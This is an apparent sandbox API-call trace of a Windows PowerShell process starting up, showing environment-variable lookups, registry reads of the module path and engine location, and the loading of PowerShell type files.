	[0512.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0514.243] SetConsoleCtrlHandler (HandlerRoutine=0x2ac68dc, Add=1) returned 1
	[0514.264] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x314
	[0514.266] CoCreateGuid (in: pguid=0xaddf0 | out: pguid=0xaddf0*(Data1=0x94001c1d, Data2=0x2dc2, Data3=0x436e, Data4=([0]=0x97, [1]=0xc7, [2]=0x20, [3]=0x5d, [4]=0xb5, [5]=0x8f, [6]=0x79, [7]=0xdf))) returned 0x0
	[0514.268] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0514.268] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.268] CoTaskMemFree (pv=0x19b1a0) 
	[0515.624] WinSqmIsOptedIn () returned 0x0
	[0515.626] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0515.626] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.626] CoTaskMemFree (pv=0x19b1a0) 
	[0515.632] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0515.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.632] CoTaskMemFree (pv=0x19b1a0) 
	[0515.633] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0515.633] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.633] CoTaskMemFree (pv=0x19b1a0) 
	[0515.635] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0515.635] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.635] CoTaskMemFree (pv=0x19b1a0) 
	[0515.635] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0515.635] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.635] CoTaskMemFree (pv=0x19b1a0) 
	[0515.636] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0515.637] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.637] CoTaskMemFree (pv=0x19b1a0) 
	[0515.637] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0515.637] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.637] CoTaskMemFree (pv=0x19b1a0) 
	[0515.638] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0515.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.638] CoTaskMemFree (pv=0x19b1a0) 
	[0515.640] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0515.640] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.640] CoTaskMemFree (pv=0x19b1a0) 
	[0515.648] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0515.648] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.648] CoTaskMemFree (pv=0x19b1a0) 
	[0515.652] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0515.652] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.652] CoTaskMemFree (pv=0x19b1a0) 
	[0515.653] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0515.653] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.653] CoTaskMemFree (pv=0x19b1a0) 
	[0523.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.750] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0523.750] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0523.751] CoTaskMemFree (pv=0x19b1a0) 
	[0523.752] CoTaskMemAlloc (cb=0xcc) returned 0x1b8e6ed0
	[0523.752] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8e6ed0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0523.752] CoTaskMemFree (pv=0x1b8e6ed0) 
	[0523.752] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xad968 | out: phkResult=0xad968*=0x2d8) returned 0x0
	[0523.752] RegQueryValueExW (in: hKey=0x2d8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xad8ec, lpData=0x0, lpcbData=0xad8e8*=0x0 | out: lpType=0xad8ec*=0x2, lpData=0x0, lpcbData=0xad8e8*=0x6c) returned 0x0
	[0523.753] CoTaskMemAlloc (cb=0x70) returned 0x1e09a0
	[0523.753] RegQueryValueExW (in: hKey=0x2d8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xad8bc, lpData=0x1e09a0, lpcbData=0xad8b8*=0x6c | out: lpType=0xad8bc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xad8b8*=0x6c) returned 0x0
	[0523.753] CoTaskMemFree (pv=0x1e09a0) 
	[0523.753] CoTaskMemAlloc (cb=0xcc) returned 0x1b8e6ed0
	[0523.753] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b8e6ed0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0523.753] CoTaskMemFree (pv=0x1b8e6ed0) 
	[0523.753] CoTaskMemAlloc (cb=0xcc) returned 0x1b8e6ed0
	[0523.753] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8e6ed0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0523.753] CoTaskMemFree (pv=0x1b8e6ed0) 
	[0523.757] RegCloseKey (hKey=0x2d8) returned 0x0
	[0523.757] CoTaskMemAlloc (cb=0xcc) returned 0x1b8e6ed0
	[0523.757] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8e6ed0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0523.757] CoTaskMemFree (pv=0x1b8e6ed0) 
	[0523.757] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xad968 | out: phkResult=0xad968*=0x2d8) returned 0x0
	[0523.758] RegQueryValueExW (in: hKey=0x2d8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xad8ec, lpData=0x0, lpcbData=0xad8e8*=0x0 | out: lpType=0xad8ec*=0x0, lpData=0x0, lpcbData=0xad8e8*=0x0) returned 0x2
	[0523.758] RegCloseKey (hKey=0x2d8) returned 0x0
	[0523.762] CoTaskMemAlloc (cb=0x20c) returned 0x22b860
	[0523.762] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x22b860 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0523.764] CoTaskMemFree (pv=0x22b860) 
	[0523.764] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xad4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0523.765] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0523.776] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0523.776] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0523.776] CoTaskMemFree (pv=0x19b1a0) 
	[0523.778] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0523.778] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0523.778] CoTaskMemFree (pv=0x19b1a0) 
	[0523.782] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0523.782] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0523.782] CoTaskMemFree (pv=0x19b1a0) 
	[0523.782] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0523.782] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0523.782] CoTaskMemFree (pv=0x19b1a0) 
	[0523.784] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad758 | out: phkResult=0xad758*=0x324) returned 0x0
	[0523.785] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0xad76c, lpData=0x0, lpcbData=0xad768*=0x0 | out: lpType=0xad76c*=0x1, lpData=0x0, lpcbData=0xad768*=0x74) returned 0x0
	[0523.785] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0xad6dc, lpData=0x0, lpcbData=0xad6d8*=0x0 | out: lpType=0xad6dc*=0x1, lpData=0x0, lpcbData=0xad6d8*=0x74) returned 0x0
	[0523.786] CoTaskMemAlloc (cb=0x78) returned 0x1e09a0
	[0523.786] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0xad6ac, lpData=0x1e09a0, lpcbData=0xad6a8*=0x74 | out: lpType=0xad6ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xad6a8*=0x74) returned 0x0
	[0523.786] CoTaskMemFree (pv=0x1e09a0) 
	[0523.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xad420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0523.786] SetErrorMode (uMode=0x1) returned 0x1
	[0523.786] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xad630 | out: lpFileInformation=0xad630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0523.786] SetErrorMode (uMode=0x1) returned 0x1
	[0524.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xad420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0524.772] SetErrorMode (uMode=0x1) returned 0x1
	[0524.772] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad630 | out: lpFileInformation=0xad630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0524.772] SetErrorMode (uMode=0x1) returned 0x1
	[0524.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xad420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0524.776] SetErrorMode (uMode=0x1) returned 0x1
	[0524.777] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad630 | out: lpFileInformation=0xad630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0524.777] SetErrorMode (uMode=0x1) returned 0x1
	[0524.781] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0524.781] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0524.781] CoTaskMemFree (pv=0x19b1a0) 
	[0524.789] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0524.789] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0524.789] CoTaskMemFree (pv=0x19b1a0) 
	[0524.790] GetACP () returned 0x4e4
	[0524.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xacfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0524.798] SetErrorMode (uMode=0x1) returned 0x1
	[0524.798] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0524.799] GetFileType (hFile=0x328) returned 0x1
	[0524.799] SetErrorMode (uMode=0x1) returned 0x1
	[0524.799] GetFileType (hFile=0x328) returned 0x1
	[0524.800] ReadFile (in: hFile=0x328, lpBuffer=0x2e0ca18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2e0ca18*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0524.802] ReadFile (in: hFile=0x328, lpBuffer=0x2e0ca18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2e0ca18*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0524.802] ReadFile (in: hFile=0x328, lpBuffer=0x2e0ca18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2e0ca18*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0524.803] ReadFile (in: hFile=0x328, lpBuffer=0x2e0ca18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2e0ca18*, lpNumberOfBytesRead=0xad568*=0xcf3, lpOverlapped=0x0) returned 1
	[0524.803] ReadFile (in: hFile=0x328, lpBuffer=0x2e0be73, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2e0be73*, lpNumberOfBytesRead=0xad568*=0x0, lpOverlapped=0x0) returned 1
	[0524.803] ReadFile (in: hFile=0x328, lpBuffer=0x2e0ca18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2e0ca18*, lpNumberOfBytesRead=0xad568*=0x0, lpOverlapped=0x0) returned 1
	[0524.805] CloseHandle (hObject=0x328) returned 1
	[0524.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xad280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0524.810] SetErrorMode (uMode=0x1) returned 0x1
	[0524.810] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad4e0 | out: lpFileInformation=0xad4e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0524.811] SetErrorMode (uMode=0x1) returned 0x1
	[0524.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xad210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0524.812] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad5c8 | out: phkResult=0xad5c8*=0x328) returned 0x0
	[0524.813] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad54c, lpData=0x0, lpcbData=0xad548*=0x0 | out: lpType=0xad54c*=0x1, lpData=0x0, lpcbData=0xad548*=0x56) returned 0x0
	[0524.813] CoTaskMemAlloc (cb=0x5a) returned 0x2564a0
	[0524.813] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad51c, lpData=0x2564a0, lpcbData=0xad518*=0x56 | out: lpType=0xad51c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad518*=0x56) returned 0x0
	[0524.813] CoTaskMemFree (pv=0x2564a0) 
	[0524.813] RegCloseKey (hKey=0x328) returned 0x0
